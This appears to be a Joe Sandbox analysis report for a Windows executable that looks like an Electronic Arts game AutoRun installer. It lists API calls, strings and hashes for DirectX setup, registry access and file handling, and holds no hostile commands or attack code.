                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                              • String ID: %d.%d$100$101$102$103$1215$1300$Build$IVer$Software\Microsoft\Internet Explorer$Version
                                                                                                                                              • API String ID: 1586453840-2685558121
                                                                                                                                              • Opcode ID: 5c89114449e6bc325828eae396e07a57128cb86573d4cfcd060cf77c0c08b7f8
                                                                                                                                              • Instruction ID: de899b3a32cb2af15eaa5d18eb6ecfaec54b5d6c66715f52551f9a2aa385845c
                                                                                                                                              • Opcode Fuzzy Hash: 5c89114449e6bc325828eae396e07a57128cb86573d4cfcd060cf77c0c08b7f8
                                                                                                                                              • Instruction Fuzzy Hash: 4861D3B1A047459BEB20DF14D844BEB7BE9EBC8704F144429F6449B380DB789945CB9B
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416955
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00416969
                                                                                                                                              • LoadLibraryA.KERNEL32(dsetup.dll), ref: 00416981
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DirectXSetupA), ref: 0041699A
                                                                                                                                              • GetProcAddress.KERNEL32(?,DirectXSetupGetVersion), ref: 004169BE
                                                                                                                                              • GetProcAddress.KERNEL32(?,DirectXSetupGetEULAA), ref: 004169E2
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 004169EC
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00416A18
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory$AddressProc$LibraryLoad
                                                                                                                                              • String ID: Cannot get address of DirectXSetupA$Cannot get address of DirectXSetupGetVersion$Could not load dsetup.dll$DirectXSetupA$DirectXSetupGetEULAA$DirectXSetupGetVersion$Dsetup.dll$dsetup.dll
                                                                                                                                              • API String ID: 3383375925-590746012
                                                                                                                                              • Opcode ID: 6728013ffcc9761fc737054107d104eea82b8e14e575de02be08ca56f5759ead
                                                                                                                                              • Instruction ID: 931795e1dae7218fb21f2bd96e0d81854005b1a274691680fd43d5dea92e8a10
                                                                                                                                              • Opcode Fuzzy Hash: 6728013ffcc9761fc737054107d104eea82b8e14e575de02be08ca56f5759ead
                                                                                                                                              • Instruction Fuzzy Hash: 2421F5B52413006FE320AB64AD85F9BB7A8DB95B11F11892FFE85D3281DA78D444CB39
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(USER32), ref: 00422BAD
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00422BC9
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00422BDA
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00422BEB
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00422BFC
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00422C0D
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00422C1E
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00422C2F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                              • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                              • API String ID: 667068680-68207542
                                                                                                                                              • Opcode ID: 810a936632be2ce720fafd58cbae2f49093b75e770282222fd5374265a0f73c0
                                                                                                                                              • Instruction ID: f307c977e25abfbff0b048e106a8ea6a6bb34d05222bffd66cc64a19540436b9
                                                                                                                                              • Opcode Fuzzy Hash: 810a936632be2ce720fafd58cbae2f49093b75e770282222fd5374265a0f73c0
                                                                                                                                              • Instruction Fuzzy Hash: 9D215471A21721AB87959F767EC052FBAF4F649B853A0483FE804E2661C7B88049DF5C
                                                                                                                                              APIs
                                                                                                                                              • GetShortPathNameA.KERNEL32(?,?,00000400), ref: 004107BD
                                                                                                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,80000002,?,80000002,?), ref: 00410858
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 00410866
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0041088D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFormatFreeLastLocalMessageNamePathShort
                                                                                                                                              • String ID: DirectX Installed$Game Registry$Installed From$Language$Registration$Restart$SOFTWARE\$SOFTWARE\Electronic Arts\%s\%s\ergc$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\$\$can't read setRestartFlag
                                                                                                                                              • API String ID: 3903020775-341092691
                                                                                                                                              • Opcode ID: 3d2759c5747e591e863665242978f06756fe076df6fdbafd9d5ebf5856d5d1e5
                                                                                                                                              • Instruction ID: 5a2e11cbfe557d20dc58b77cc88c52bee8573eb501d7b283b44b6156cc505af9
                                                                                                                                              • Opcode Fuzzy Hash: 3d2759c5747e591e863665242978f06756fe076df6fdbafd9d5ebf5856d5d1e5
                                                                                                                                              • Instruction Fuzzy Hash: A69122712083429BD714DF24C811BFBB7E1FBD5704F004A2EF99597280DBB9A889C799
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                              • GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                              • GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(0040476A), ref: 00413C4F
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Programs,00000000,?,0045DF18,?), ref: 00413C6F
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00413C76
                                                                                                                                              • _strrchr.LIBCMT ref: 00413D9B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$AddressCloseLibraryLoadOpenPathProcQuerySystemTempValueWindows_strrchr
                                                                                                                                              • String ID: Programs$SHGetSpecialFolderPathA$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$\$shell32.dll
                                                                                                                                              • API String ID: 1347129311-4127225528
                                                                                                                                              • Opcode ID: 20eca63b0d048e5c17978578e2be2ad518ba2d992f55c58b281d0522d216412c
                                                                                                                                              • Instruction ID: 6c29c0d113d401325f6edbdc8838ba9d779a9de3388efc35fe5fb8b828dee468
                                                                                                                                              • Opcode Fuzzy Hash: 20eca63b0d048e5c17978578e2be2ad518ba2d992f55c58b281d0522d216412c
                                                                                                                                              • Instruction Fuzzy Hash: AA512834348341AFE720CF649C16FEB7B945F46B06F14445DF980AB283E6A8D648C7AE
                                                                                                                                              APIs
                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0041BD52
                                                                                                                                              • CoCreateInstance.OLE32 ref: 0041BD7A
                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0041BE09
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0041BE4B
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0041BE85
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,0000000A,00000000,00000000), ref: 0041BEBD
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0041BEDB
                                                                                                                                              • CoUninitialize.OLE32 ref: 0041BF1D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Clear$ByteCharCreateInitInitializeInstanceMultiUninitializeWide
                                                                                                                                              • String ID: DxDiag_SystemInfo$dwDirectXVersionMajor$dwDirectXVersionMinor$o$szDirectXVersionLetter
                                                                                                                                              • API String ID: 2631059323-2475506770
                                                                                                                                              • Opcode ID: 45ec07c7a0de31864688631775407bbafd12fcb00f604bec3ea34e2fc70ed8bd
                                                                                                                                              • Instruction ID: b5decee8adbc2d1d78082e6867677709e582f8e87df30048daafc0e7f78e0333
                                                                                                                                              • Opcode Fuzzy Hash: 45ec07c7a0de31864688631775407bbafd12fcb00f604bec3ea34e2fc70ed8bd
                                                                                                                                              • Instruction Fuzzy Hash: D3511674208381AFD700CF25C884A9BBBE9EFCA704F04894EF584C7261D779D985CBA6
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                                                • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,00000000), ref: 0040C0FD
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040C10C
                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040C117
                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040C12B
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C30F
                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 0040C321
                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,00000000), ref: 0040C32C
                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000), ref: 0040C343
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFileSleep$AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                                              • String ID: %s\AutoRun.exe$%s\AutoRunGUI.dll$-restart -dir $Could not copy '%s' to '%s'
                                                                                                                                              • API String ID: 3057974866-2581532531
                                                                                                                                              • Opcode ID: fd5262b79a8323c6ee9bbbd5519ee61f856e7b900ff64039663f89a4e1efefc1
                                                                                                                                              • Instruction ID: 5c815c8dee34c80f282a7deb6532afe064d91d0bacc265e00ff7ac027498d6f5
                                                                                                                                              • Opcode Fuzzy Hash: fd5262b79a8323c6ee9bbbd5519ee61f856e7b900ff64039663f89a4e1efefc1
                                                                                                                                              • Instruction Fuzzy Hash: C8B199B2144340AFD315EBA0CCC5EEB73A9EFC4704F044E2EB58657191EB78A648C79A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s\%s$%s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                                              • API String ID: 0-1652018963
                                                                                                                                              • Opcode ID: be913b56ed26ee2750d62859451965158e8d14aa541663ac7088a56196c6f96f
                                                                                                                                              • Instruction ID: 726ea9fac86a746ee88a84a523912b90f33f2c02f38a423fdf5978b62fbff5e6
                                                                                                                                              • Opcode Fuzzy Hash: be913b56ed26ee2750d62859451965158e8d14aa541663ac7088a56196c6f96f
                                                                                                                                              • Instruction Fuzzy Hash: 42D15C715083829FC321DB34D894BEBB7E5AF95308F04495EE5C987281EB38D64DCB56
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %s\%s$%s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                                              • API String ID: 0-1652018963
                                                                                                                                              • Opcode ID: 0327c2d6323db41f253a0066c32c2d91ef57ac9b8a11f82df8a7614baadf85a6
                                                                                                                                              • Instruction ID: 2d8a66965c8b461d22716a2f9fc51bb70f3807e377028b73b074f7c4a795e774
                                                                                                                                              • Opcode Fuzzy Hash: 0327c2d6323db41f253a0066c32c2d91ef57ac9b8a11f82df8a7614baadf85a6
                                                                                                                                              • Instruction Fuzzy Hash: B0C15E715083829FC321DB20D894FEBB7E9AF95308F08495EE5C987241EB38D64DCB96
                                                                                                                                              APIs
                                                                                                                                              • RegEnumKeyExA.ADVAPI32 ref: 004175AE
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004175F5
                                                                                                                                              • RegOpenKeyExA.ADVAPI32 ref: 0041761F
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0041763F
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00417651
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041766F
                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000000,00020019,?), ref: 00417707
                                                                                                                                              • RegOpenKeyExA.ADVAPI32 ref: 00417731
                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00417744
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00417755
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$DeleteOpen$Enum
                                                                                                                                              • String ID: %s\%s
                                                                                                                                              • API String ID: 2508677364-4073750446
                                                                                                                                              • Opcode ID: 46427c48c67e0cc231f759d9888d3613f253180f667232f7090628fbc8ee51e4
                                                                                                                                              • Instruction ID: 890bdd7ef58192d3601e2139cb52636c82b3411bbe28373fb4b23228c678dd54
                                                                                                                                              • Opcode Fuzzy Hash: 46427c48c67e0cc231f759d9888d3613f253180f667232f7090628fbc8ee51e4
                                                                                                                                              • Instruction Fuzzy Hash: 8C5191B55087419FD320DF58D884AEBB7F8FB89314F044D2EF99683241D7389A48CB66
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,75920A60,00000000,0042575D), ref: 0042B11D
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042B135
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042B142
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042B14F
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042B15C
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0042B1DA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$CurrentHandleModuleThread
                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                                                                                              • API String ID: 46939698-282957996
                                                                                                                                              • Opcode ID: fa3fe8352348c15f00598b62091e80e0ddde9f8a27996319b7a897add45f9042
                                                                                                                                              • Instruction ID: 8343617a602856c7a5069f3be63dd48b7f90f14781bef638d1b05418c87fafc1
                                                                                                                                              • Opcode Fuzzy Hash: fa3fe8352348c15f00598b62091e80e0ddde9f8a27996319b7a897add45f9042
                                                                                                                                              • Instruction Fuzzy Hash: D321B0706513609BC7B09FB6BC0592B3BE0EB427B9761093FE800C32A0EB789805DB5D
                                                                                                                                              APIs
                                                                                                                                              • RemoveDirectoryA.KERNEL32 ref: 00418F96
                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?), ref: 0041901D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DirectoryPathRemoveTemp
                                                                                                                                              • String ID: %s\cache.dat$%s\filelist.txt$\$\$\
                                                                                                                                              • API String ID: 1713547617-3190903220
                                                                                                                                              • Opcode ID: fe41703e54320f95e6681c1eb24154ae3abf6755114a66f0cff30b271b00e26e
                                                                                                                                              • Instruction ID: 9d8b5efe2bea3eca9e416bc16e4a7f17c4f3e66b95ae640699afb986d6dc11f0
                                                                                                                                              • Opcode Fuzzy Hash: fe41703e54320f95e6681c1eb24154ae3abf6755114a66f0cff30b271b00e26e
                                                                                                                                              • Instruction Fuzzy Hash: B8715B710083869FC331DB20D8A4BE7B7E9AFD9308F04495EE5C987241EB39964DC74A
                                                                                                                                              APIs
                                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0044D18C,00000001,00000000,00000000,0044EA50,00000038,004275F5,000000FF,00000200,?,00000002,?,00000002,?), ref: 00430BE7
                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,000000FF,00419BB0,?,?), ref: 00430BF9
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0044EA50,00000038,004275F5,000000FF,00000200,?,00000002,?,00000002,?), ref: 00430C80
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,?,000000FF,00419BB0,?,?), ref: 00430D01
                                                                                                                                              • LCMapStringW.KERNEL32(00000010,?,?,00000000,00000000,00000000,?,00000000,?,000000FF,00419BB0,?,?), ref: 00430D1B
                                                                                                                                              • LCMapStringW.KERNEL32(00000010,?,?,00000000,?,?,?,00000000,?,000000FF,00419BB0,?,?), ref: 00430D56
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1775797328-0
                                                                                                                                              • Opcode ID: d8a76754379fe254c5ee1d4274d7db85904f9d2338a9600fb25799d2cf117cde
                                                                                                                                              • Instruction ID: aa89c333057c4e435e6b64ceb4fb56c1cd3fb09bfbed1fcd7610a6d3c1857a38
                                                                                                                                              • Opcode Fuzzy Hash: d8a76754379fe254c5ee1d4274d7db85904f9d2338a9600fb25799d2cf117cde
                                                                                                                                              • Instruction Fuzzy Hash: C1B1A9B2800119EFCF219FA4DC958EE7BB5FF0C314F10562AFA11A2260D73989A1DB59
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 0043649A
                                                                                                                                              • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004364D2
                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004364DA
                                                                                                                                                • Part of subcall function 00438DD6: UnhookWindowsHookEx.USER32(?), ref: 00438DFB
                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004364EC
                                                                                                                                              • GetDesktopWindow.USER32 ref: 00436519
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00436527
                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00436536
                                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 004365C5
                                                                                                                                              • GetActiveWindow.USER32 ref: 004365D0
                                                                                                                                              • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004365DE
                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004365FA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 833315621-0
                                                                                                                                              • Opcode ID: e199c737b50d517b0b306a191cb206ffac98a79345493696f53003073e33933f
                                                                                                                                              • Instruction ID: f6843848d02d9acbe4f9de89053a38c821629bc9e9d675896fa0d8a5ac17685f
                                                                                                                                              • Opcode Fuzzy Hash: e199c737b50d517b0b306a191cb206ffac98a79345493696f53003073e33933f
                                                                                                                                              • Instruction Fuzzy Hash: C741D030900706FFCF21AFA5E84976EBBB5BF09715F11403EF501A22A1CB785A41CA5E
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(0040476A), ref: 00413C4F
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Programs,00000000,?,0045DF18,?), ref: 00413C6F
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00413C76
                                                                                                                                              • _strrchr.LIBCMT ref: 00413D9B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenQueryValue_strrchr
                                                                                                                                              • String ID: Desktop$Programs$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Startup$\
                                                                                                                                              • API String ID: 2924401097-2691228934
                                                                                                                                              • Opcode ID: 0451721ad7b7bfeab725ab4e83a88f08b5d70f3a35907e647927684d4f7ca702
                                                                                                                                              • Instruction ID: 758c6f36c939e7f1c2052588e335acff266e04ba565fef884f1b9ab40d81982e
                                                                                                                                              • Opcode Fuzzy Hash: 0451721ad7b7bfeab725ab4e83a88f08b5d70f3a35907e647927684d4f7ca702
                                                                                                                                              • Instruction Fuzzy Hash: 5B511730208341AEE314CF25DC51FEB7BD45F95B06F14484DF9C497282EAB8E648C76A
                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 004431B7
                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,0047EB48,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 00443208
                                                                                                                                              • GlobalHandle.KERNEL32(?), ref: 00443211
                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0044321B
                                                                                                                                              • GlobalReAlloc.KERNEL32(?,0047EB48,00002002), ref: 0044322F
                                                                                                                                              • GlobalHandle.KERNEL32(?), ref: 00443241
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00443248
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0047EB28,?,?,?,?,?,?,004436E2,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 00443251
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0044325D
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0047EB28), ref: 004432A5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2667261700-0
                                                                                                                                              • Opcode ID: 3551d93637448cf2e120c907dbe145befb04d6cacd3523446f38783358951b8d
                                                                                                                                              • Instruction ID: b0708ac090b4c07532e2f73ad039cb67d6ce4f3aec897b0794ea91f6c69e5c79
                                                                                                                                              • Opcode Fuzzy Hash: 3551d93637448cf2e120c907dbe145befb04d6cacd3523446f38783358951b8d
                                                                                                                                              • Instruction Fuzzy Hash: 0A31AB74600704AFEB20CF74CC48A5ABBF9FF86746B014A6EE852C3620DB75EA00CB54
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 00437855
                                                                                                                                              • GetClassInfoA.USER32(?,?,?), ref: 00437870
                                                                                                                                              • RegisterClassA.USER32(?), ref: 00437883
                                                                                                                                              • lstrlenA.KERNEL32(-00000034,00000001), ref: 004378BF
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 004378C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Classlstrlen$H_prologInfoRegister
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3690589370-0
                                                                                                                                              • Opcode ID: b7666c6804b7a4e1af4ad46b385648ce39fa1e020673036b6e24608731eaa827
                                                                                                                                              • Instruction ID: d06448f70216e37ad6dd6e7a27fae02cd191811b199e5e129bd5a26421677b7e
                                                                                                                                              • Opcode Fuzzy Hash: b7666c6804b7a4e1af4ad46b385648ce39fa1e020673036b6e24608731eaa827
                                                                                                                                              • Instruction Fuzzy Hash: 2431F7B1904109FFDF11AFA0CD05BAEBFB4FF09315F004126F845A2251C7389A11DB99
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 0043628D
                                                                                                                                              • GetSystemMetrics.USER32(0000002A), ref: 00436351
                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004363BC
                                                                                                                                              • CreateDialogIndirectParamA.USER32(?,?,?,00435D22,00000000), ref: 004363EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                                                                                              • String ID: MS Shell Dlg
                                                                                                                                              • API String ID: 2364537584-76309092
                                                                                                                                              • Opcode ID: 99dbcdcf67a2fa19b37189b7afad9b74a6c17b04bf948d761a6e24d7af02056e
                                                                                                                                              • Instruction ID: 760bf385a5f842c8bc42ff6da57cfb0a7f61815e02265039a4cce4437fa5ada3
                                                                                                                                              • Opcode Fuzzy Hash: 99dbcdcf67a2fa19b37189b7afad9b74a6c17b04bf948d761a6e24d7af02056e
